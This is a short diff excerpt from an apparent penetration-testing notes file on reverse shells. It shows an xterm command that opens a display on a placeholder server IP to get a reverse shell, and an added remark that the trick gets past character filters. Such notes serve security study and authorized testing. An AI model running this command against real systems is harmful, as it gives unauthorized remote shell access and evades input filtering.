Reboare/backup/os-agnostic/reverse-shells.md

 xterm -display <server ip>:3
 ```

 From this you'll receive a reverse shell.
+I've found this useful to bypass certain character filters and if no other option presents itself.